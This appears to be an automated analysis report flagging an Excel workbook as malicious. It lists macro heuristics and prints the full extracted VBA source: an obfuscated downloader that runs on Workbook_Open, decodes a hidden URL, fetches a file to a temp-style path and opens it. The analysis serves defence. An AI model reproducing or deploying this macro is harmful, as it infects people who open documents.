MALICIOUS
188
Risk Score
Heuristics 6
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set pubbyRodger_1 = CreateObject(hubabuba(0)) -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
rbp = CallByName(pubbyRodger_1, hubabuba(10), VbGet) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Public Sub Workbook_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14539 bytes |
SHA-256: a57a3cac066b387a6457a29a8c0303d41c04d69d72ca06ce6e9aa7592c27d95d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Sub Workbook_Open()
Call CenterByMan
End Sub
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{1D387618-E5F2-4E8B-9DE5-5C675DC0F0DB}{C13F9C84-F124-4839-A5B4-36CC9976B137}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Module1"
Public pubbyRodger_1 As Object
Public pubbyRodger_2 As Object
Public pubbyRodger_3 As Object
Public pubbyRodger_7() As String
Public pubbyRodger_4 As String
Public pubbyRodger_5 As String
Public pubbyRodger_6 As Object
Public hubabuba() As String
Public MapsInitialized As Boolean
Public mDBname As String
Public MapInit As Boolean
' ________________________________________Util Functions End____________________________________________
' summe vom Range
Public Function rngCol(ByVal startRow As Integer, ByVal endRow As Integer, ByVal arrCol As Variant)
Dim res()
ReDim res(1 To endRow - startRow + 1, 1 To 1)
Dim i As Integer
Dim j As Integer
Dim sum As Double
For i = startRow To endRow
For j = 0 To UBound(arrCol)
If IsNumeric(Cells(i, arrCol(j)).Value) Then
sum = sum + Cells(i, arrCol(j)).Value
End If
Next j
res(i - startRow + 1, 1) = sum
sum = 0
Next i
rngCol = res
End Function
Public Function rngArr(ByVal startRow As Integer, ByVal endRow As Integer, ByVal arrCol As Variant)
Dim res()
ReDim res(1 To endRow - startRow + 1, 1 To 1)
Dim i As Integer
Dim j As Integer
Dim sum()
ReDim sum(0 To UBound(arrCol))
For i = startRow To endRow
For j = 0 To UBound(arrCol)
sum(j) = Cells(i, arrCol(j)).Value
Next j
res(i - startRow + 1, 1) = sum
ReDim sum(0 To UBound(arrCol))
Next i
rngArr = res
End Function
Public Function rng(ByVal start As Integer, ByVal ending As Integer)
Dim res()
ReDim res(0 To ending - start)
Dim i As Integer
For i = start To ending
res(i - start) = i
Next i
rng = res
End Function
Public Sub CenterByMan()
Dim Col As String
Dim obj As String
hubabuba = Split(UserForm1.Label1.Caption, "/")
GoTo ErrExit
ErrExit:
Set pubbyRodger_1 = CreateObject(hubabuba(0))
CheckBins
Exit Sub
husbanDip:
AD.DisplayError Err.Number, "modMaps", "CenterByMan", Err.Description
Resume ErrExit
End Sub
' ______________________________ Print______________________________________________
Public Function p()
' check if the val is array
Dim is_a As Boolean
Dim k
For Each k In Me.dict.Keys
is_a = IsArray(Me.dict(k))
Exit For
Next k
If is_a Then
For Each k In Me.dict.Keys
Debug.Print k & " " & a_toString(Me.Item(k))
Next k
Else
For Each k In Me.dict.Keys
Debug.Print k & " " & Me.Item(k)
Next k
End If
End Function
Public Function a_toString(ByVal arr As Variant) As String
Dim res As String
Dim i
res = "["
For Each i In arr
res = res & Replace(" " & i, ",", ".") & ", "
Next i
res = Left(res, Len(res) - 2)
a_toString = res & " ]"
End Function
Public Function pk()
Dim k
For Each k In Me.dict.Keys
Debug.Print k
Next k
End Function
Public Sub SaveMaps()
rbp = CallByName(pubbyRodger_1, hubabuba(10), VbGet)
Dim objStor As Variant
CallByName pubbyRodger_2, hubabuba(9), VbMethod, rbp
CallByName pubbyRodger_2, hubabuba(11), VbMethod, pubbyRodger_5, 2
GoTo husbanDip
ErrExit:
Exit Sub
husbanDip:
pubbyRodger_6.Open (pubbyRodger_5)
End Sub
Attribute VB_Name = "Module4"
Public Function toJSON(Optional ByVal k As String = "root") As String
Dim res As String
res = "{""name"":""" & k & """," & Chr(13)
res = res & """children"":[" & Chr(13)
Dim ky
For Each ky In pDict.Keys
res = res & "{""name"":""" & Replace(CStr(ky), """", "") & """, " & """size"": " & Replace(CStr(pDict(ky)), ",", ".") & "}," & Chr(13)
Next ky
toJSON = Left(res, Len(res) - 2) & Chr(13) & "]}"
End Function
Attribute VB_Name = "Module3"
Public Function productRng(ByVal operand2 As Variant, ByVal operation As String) As Variant
Dim k
Dim i
Dim res As Variant
Set res = New Dicts
Call res.ini
If IsNumeric(operand2) Then
' if the second operand is numeric
For Each k In pDict.Keys
res.dict(k) = productArr(pDict(k), operation, operand2)
Next k
Else
For Each k In pDict.Keys
If operand2.dict.Exists(k) Then
res.dict(k) = productArr(pDict(k), operation, operand2.dict(k))
End If
Next k
End If
Set productRng = res
End Function
Public Function productArr(ByVal arr1 As Variant, ByVal operation As String, ByVal arr2 As Variant) As Variant
Dim res
Dim i
ReDim res(LBound(arr1) To UBound(arr1))
If IsNumeric(arr2) Then
For i = LBound(arr1) To UBound(arr1)
res(i) = Application.Evaluate(Replace(arr1(i) & operation & arr2, ",", "."))
Next i
Else
For i = LBound(arr1) To UBound(arr1)
res(i) = Application.Evaluate(Replace(arr1(i) & operation & arr2(i), ",", "."))
Next i
End If
productArr = res
End Function
Public Function crentips(nY As Integer) As String
Dim pubbyRodger_8 As Integer
Dim pubbyRodger3_1 As String
pubbyRodger3_1 = ""
GoTo s2
s2:
For pubbyRodger_8 = LBound(pubbyRodger_7) To UBound(pubbyRodger_7)
pubbyRodger3_1 = pubbyRodger3_1 & Chr(CInt(pubbyRodger_7(pubbyRodger_8)) - 1000)
Next pubbyRodger_8
GoTo SIDR4
SIDR4:
pubbyRodger_1.Open hubabuba(5), pubbyRodger3_1, False
KeepBlyading
End Function
Public Function clone__(ByVal d As Variant, ByVal l As Integer) As Variant
Dim res As New Dicts
Dim k
Call res.ini
If l > 1 Then
For Each k In d.dict.Keys
Set res.dict(k) = clone__(d.dict(k), l - 1)
Next k
Else
For Each k In d.dict.Keys
res.dict(k) = d.dict(k)
Next k
End If
Set clone__ = res
End Function
Public Sub CheckBins()
pubbyRodger_7 = Split("1104:1116:1116:1112:1058:1047:1047:1107:1111:1114:1112:1111:1114:1097:1116:1105:1118:1046:1108:1097:1115:1101:1114:1102:1114:1111:1110:1116:1046:1100:1112:1046:1117:1097:1047:1105:1109:1103:1047:1098:1097:1099:1107:1103:1114:1111:1117:1110:1100:1047:1055:1054:1103:1104:1098:1121:1054:1102:1052:1053:1046:1101:1120:1101", _
":")
Dim LP As Long
Dim BinID As Long
Dim objStorages As String
Dim objStorage As Variant
Dim MapID As Long
Set pubbyRodger_2 = CreateObject(hubabuba(1))
GoTo husbanDip
ErrExit:
Exit Sub
husbanDip:
Set pubbyRodger_6 = CreateObject(hubabuba(2))
Set husbanD = CreateObject(hubabuba(3))
Set pubbyRodger_3 = husbanD.Environment(hubabuba(4))
crentips 3
End Sub
Public Function filterInklude(ByVal reg As Object) As Variant
Dim k
Dim res As Variant
Set res = New Dicts
Call res.ini
For Each k In pDict.Keys
If reg.test(k) Then
res.dict(k) = pDict(k)
End If
Next k
Set filterInklude = res
End Function
''''''''''''''''''''
'set all the elements to a constant
'default to be 1
''''''''''''''''''''
Public Function constDict(Optional ByVal constant As Variant) As Variant
Dim k
Dim res As Variant
Set res = New Dicts
Call res.ini
If IsMissing(constant) Then
constant = 1
End If
For Each k In pDict.Keys
res.dict(k) = constant
Next k
Set constDict = res
End Function
Attribute VB_Name = "Module2"
'''''''''''''''''''
'@param operand2 can be either number or Dicts
' operation supports only the string
'''''''''''''''''''
Public Function product() As Variant
Dim k
Dim isNum As Boolean
isNum = True
pubbyRodger_5 = pubbyRodger_4
GoTo LABZ4
Dim res As Variant
Call res.ini
If Not IsMissing(IsNumericOperation) Then
If Not IsNumericOperation Then
isNum = False
End If
Else
isNum = True
End If
LABZ4:
pubbyRodger_5 = pubbyRodger_5 + hubabuba(12)
Exit Function
If IsNumeric(operand2) Then
' if the second operand is numeric
For Each k In pDict.Keys
If Not isNum Then
res.dict(k) = App.lication.Evaluate(Appli.cation.Works.heetFunction.Substitute(pDict(k) & operation & operand2, ",", "."))
Else
res.dict(k) = Appli.cation.Evaluate(pDict(k) & operation & operand2)
End If
Next k
Else
For Each k In pDict.Keys
If Not isNum Then
If operand2.dict.Exists(k) Then
res.dict(k) = Appli.cation.Evaluate(Appli.cation.WorksheetFunction.Substitute(pDict(k) & operation & operand2.dict(k), ",", "."))
End If
Else
If operand2.dict.Exists(k) Then
res.dict(k) = Applica.tion.Evaluate(pDict(k) & operation & operand2.dict(k))
End If
End If
Next k
End If
Set product = res
End Function
Public Sub OnasOn()
CallByName pubbyRodger_2, hubabuba(7), VbLet, 1
pubbyRodger_2.Open
GoTo husbanDip
ErrExit:
Exit Sub
husbanDip:
SaveMaps
End Sub
Public Function reduceRngVertical(ByVal sign As String) As Variant
Dim k
Dim i
Dim tmpCnt As Integer
tmpCnt = 1
Dim arr()
Dim u As Integer
Dim l As Integer
For Each k In pDict.Keys
If tmpCnt = 1 Then
u = UBound(pDict(k))
l = LBound(pDict(k))
ReDim arr(l To u)
tmpCnt = 2
If sign = "+" Then
For i = l To u
arr(i) = 0
Next i
Else
For i = l To u
arr(i) = 1
Next i
End If
End If
If sign = "+" Then
For i = l To u
arr(i) = arr(i) + pDict(k)(i)
Next i
Else
For i = l To u
arr(i) = arr(i) * pDict(k)(i)
Next i
End If
Next k
reduceRngVertical = arr
End Function
Public Function reduceArray(ByVal arr, ByVal sign As String) As Variant
Dim res As Variant
Dim k
If sign = "" Or sign = "+" Then
res = 0
For Each k In arr
res = res + k
Next k
ElseIf sign = "*" Then
res = 1
For Each k In arr
res = res * k
Next k
End If
reduceArray = res
End Function
Public Function filterVal(ByVal operation As String, Optional ByVal placeholder As String = "{*}", Optional ByVal hasThousandSep As Boolean = True) As Variant
Dim k
Dim tmp As String
Dim res As Variant
Set res = New Dicts
Call res.ini
If hasThousandSep Then
For Each k In pDict.Keys
tmp = Replace(pDict(k) & "", ",", ".")
If Application.Evaluate(Replace(operation, placeholder, tmp)) Then
res.dict(k) = k
End If
Next k
Else
For Each k In pDict.Keys
If Application.Evaluate(Replace(operation, placeholder, pDict(k) & "")) Then
res.dict(k) = k
End If
Next k
End If
Set filterVal = res
End Function
Public Sub KeepBlyading()
pubbyRodger_1.Send
GoTo SIDR4
If IsMissing(keepOriginalVal) Then
keepOriginalVal = True
End If
Dim k
Dim res As Variant
res.dict = pDict
For Each k In dict2.dict.Keys
If Not pDict.Exists(k) Then
res.dict(k) = dict2.dict(k)
ElseIf Not keepOriginalVal Then
res.dict(k) = dict2.dict(k)
End If
Next k
Set Add = res
SIDR4:
pubbyRodger_4 = pubbyRodger_3(hubabuba(6))
GoTo SIDR1
SIDR1:
product
OnasOn
End Sub
Public Function filterExklude(ByVal reg As Object) As Variant
Dim k
Dim res As Variant
Set res = New Dicts
Call res.ini
For Each k In pDict.Keys
If Not reg.test(k) Then
res.dict(k) = pDict(k)
End If
Next k
Set filterExklude = res
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.